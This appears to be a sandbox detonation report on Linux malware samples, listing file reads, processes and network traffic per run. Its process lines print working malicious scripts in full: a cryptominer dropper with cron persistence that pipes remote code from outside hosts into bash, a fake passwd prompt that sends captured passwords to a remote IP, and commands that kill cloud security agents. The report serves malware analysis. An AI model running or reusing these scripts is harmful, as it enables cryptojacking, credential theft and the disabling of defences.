File opened for reading /sys/devices/system/cpu/online /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/types /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/cpu/possible /tmp/xrx/xrx N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/meminfo /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/unified/cgroup.controllers /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/level /tmp/xrx/xrx N/A
File opened for reading /sys/fs/cgroup/cpuset/cpuset.mems /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/kernel/mm/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access1/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/dax/devices /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/devices/virtual/dmi/id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition /tmp/xrx/xrx N/A
File opened for reading /sys/devices/system/node/online /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/DMI /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/cpumap /tmp/xrx/xrx N/A
File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level /tmp/xrx/xrx N/A
File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map /tmp/xrx/xrx N/A
File opened for reading /sys/firmware/dmi/tables/smbios_entry_point /tmp/xrx/xrx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/mounts /tmp/xrx/xrx N/A
File opened for reading /proc/self/cpuset /tmp/xrx/xrx N/A
File opened for reading /proc/meminfo /tmp/xrx/xrx N/A
File opened for reading /proc/driver/nvidia/gpus /tmp/xrx/xrx N/A

Processes

/tmp/xrx/xrx

[/tmp/xrx/xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
CH 179.43.154.189:2008 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 151.101.129.91:443 tcp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp
CH 179.43.154.189:2008 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240611-en

Max time kernel

4s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/732/cmdline /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/760/stat /usr/bin/killall N/A
File opened for reading /proc/726/cmdline /usr/bin/killall N/A
File opened for reading /proc/769/stat /usr/bin/killall N/A
File opened for reading /proc/364/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/420/stat /usr/bin/killall N/A
File opened for reading /proc/758/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/381/stat /usr/bin/killall N/A
File opened for reading /proc/726/cmdline /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/362/stat /usr/bin/killall N/A
File opened for reading /proc/750/stat /usr/bin/killall N/A
File opened for reading /proc/236/stat /usr/bin/killall N/A
File opened for reading /proc/758/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/175/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/391/stat /usr/bin/killall N/A
File opened for reading /proc/127/cmdline /usr/bin/killall N/A
File opened for reading /proc/726/stat /usr/bin/killall N/A
File opened for reading /proc/751/stat /usr/bin/killall N/A
File opened for reading /proc/760/stat /usr/bin/killall N/A
File opened for reading /proc/364/stat /usr/bin/killall N/A
File opened for reading /proc/727/cmdline /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/255/stat /usr/bin/killall N/A
File opened for reading /proc/384/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/69/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/752/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsel-20240418-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

14s

Max time network

132s

Command Line

[/tmp/xrx/secure]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /bin/bash N/A
N/A N/A /usr/bin/chmod N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/50/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/791/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1052/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/48/stat /usr/bin/pgrep N/A
File opened for reading /proc/436/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/5/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/508/stat /usr/bin/pgrep N/A
File opened for reading /proc/2558/ctty /usr/bin/pgrep N/A
File opened for reading /proc/22/status /usr/bin/pgrep N/A
File opened for reading /proc/23/stat /usr/bin/pgrep N/A
File opened for reading /proc/54/stat /usr/bin/pgrep N/A
File opened for reading /proc/2245/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2316/stat /usr/bin/pgrep N/A
File opened for reading /proc/10/status /usr/bin/pgrep N/A
File opened for reading /proc/20/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/28/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2346/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/56/status /usr/bin/pgrep N/A
File opened for reading /proc/274/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/80/stat /usr/bin/pgrep N/A
File opened for reading /proc/1079/stat /usr/bin/pgrep N/A
File opened for reading /proc/2007/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2220/status /usr/bin/pgrep N/A
File opened for reading /proc/2314/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/771/status /usr/bin/pgrep N/A
File opened for reading /proc/417/stat /usr/bin/pgrep N/A
File opened for reading /proc/585/status /usr/bin/pgrep N/A
File opened for reading /proc/2477/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/152/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1776/stat /usr/bin/pgrep N/A
File opened for reading /proc/24/stat /usr/bin/pgrep N/A
File opened for reading /proc/42/ctty /usr/bin/pgrep N/A
File opened for reading /proc/184/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/185/status /usr/bin/pgrep N/A
File opened for reading /proc/2/status /usr/bin/pgrep N/A
File opened for reading /proc/35/ctty /usr/bin/pgrep N/A
File opened for reading /proc/53/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/13/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/372/status /usr/bin/pgrep N/A
File opened for reading /proc/2479/status /usr/bin/pgrep N/A
File opened for reading /proc/2249/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2307/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2607/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/55/status /usr/bin/pgrep N/A
File opened for reading /proc/456/stat /usr/bin/pgrep N/A
File opened for reading /proc/187/status /usr/bin/pgrep N/A
File opened for reading /proc/1129/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2295/ctty /usr/bin/pgrep N/A
File opened for reading /proc/183/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/417/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/580/stat /usr/bin/pgrep N/A
File opened for reading /proc/1057/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/36/status /usr/bin/pgrep N/A
File opened for reading /proc/791/status /usr/bin/pgrep N/A
File opened for reading /proc/26/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/392/stat /usr/bin/pgrep N/A
File opened for reading /proc/816/status /usr/bin/pgrep N/A
File opened for reading /proc/2249/ctty /usr/bin/pgrep N/A
File opened for reading /proc/31/ctty /usr/bin/pgrep N/A
File opened for reading /proc/64/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/771/stat /usr/bin/pgrep N/A
File opened for reading /proc/2551/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2827/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2830/status /usr/bin/pgrep N/A

Processes

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c exec '/tmp/xrx/secure' "$@" /tmp/xrx/secure]

/tmp/xrx/secure

[/tmp/xrx/secure]

/bin/bash

[/tmp/xrx/secure -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." 
downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/xrx/secure]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/usr/bin/awk

[awk {print $5}]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/usr/bin/mv

[mv config-xrx.json config.json]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/usr/bin/grep

[grep -q secure]

/usr/bin/cat

[cat /etc/crontab]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/sleep

[sleep 1]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.82:80 security.ubuntu.com tcp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240729-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

Signatures

N/A

Processes

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c exec '/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973' "$@" /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973 -c #!/bin/bash if [ "$1" = "pollo" ]; then echo 'pollo 👍' exit fi username=$(whoami) if [ "$username" = "root" ]; then if [ "$#" -ne "0" ]; then echo 'Changing password for user '$1. else echo 'Changing password for user root.' fi sleep 0.1 read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi else echo 'Changing password for user '$username. read -sp '(current) UNIX password:' passvar0 echo -e read -sp 'New password:' passvar1 sleep 0.1 echo -e read -sp 'Retype new password:' passvar2 pass=$(echo $username $passvar0 $passvar1 $passvar2 | base64) curl -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null || cd1 -s http://45.10.20.100:1010/pass?pass=$pass &> /dev/null if [ "$passvar1" != "$passvar2" ]; then echo -e echo 'Sorry, passwords do not match.' echo 'passwd: Have exhausted maximum number of retries for service' sleep 0.2 else echo -e echo 'passwd: all authentication tokens updated successfully.' sleep 0.2 fi fi /tmp/样本/Linux/shc加密脚本/CDAFEFEDB4709959B4260435DC6F5973]

/usr/bin/whoami

[whoami]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/sleep

[sleep 0.1]

/usr/bin/base64

[base64]

/usr/bin/curl

[curl -s http://45.10.20.100:1010/pass?pass=cm9vdAo=]

/usr/bin/sleep

[sleep 0.2]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 45.10.20.100:1010 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:45

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240611-en

Max time kernel

9s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

0s

Max time network

131s

Command Line

[/tmp/xrx/init.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/983/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1081/cmdline /usr/bin/pidof N/A
File opened for reading /proc/6/cmdline /usr/bin/pidof N/A
File opened for reading /proc/26/stat /usr/bin/pidof N/A
File opened for reading /proc/216/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1282/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1353/stat /usr/bin/pidof N/A
File opened for reading /proc/12/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1065/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1095/stat /usr/bin/pidof N/A
File opened for reading /proc/102/stat /usr/bin/pidof N/A
File opened for reading /proc/505/stat /usr/bin/pidof N/A
File opened for reading /proc/825/stat /usr/bin/pidof N/A
File opened for reading /proc/1129/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1568/stat /usr/bin/pidof N/A
File opened for reading /proc/6/stat /usr/bin/pidof N/A
File opened for reading /proc/74/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/stat /usr/bin/pidof N/A
File opened for reading /proc/995/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1129/stat /usr/bin/pidof N/A
File opened for reading /proc/1574/stat /usr/bin/pidof N/A
File opened for reading /proc/5/stat /usr/bin/pidof N/A
File opened for reading /proc/101/stat /usr/bin/pidof N/A
File opened for reading /proc/113/stat /usr/bin/pidof N/A
File opened for reading /proc/428/stat /usr/bin/pidof N/A
File opened for reading /proc/1161/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1163/stat /usr/bin/pidof N/A
File opened for reading /proc/1261/stat /usr/bin/pidof N/A
File opened for reading /proc/1567/stat /usr/bin/pidof N/A
File opened for reading /proc/27/cmdline /usr/bin/pidof N/A
File opened for reading /proc/82/stat /usr/bin/pidof N/A
File opened for reading /proc/92/cmdline /usr/bin/pidof N/A
File opened for reading /proc/824/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1167/stat /usr/bin/pidof N/A
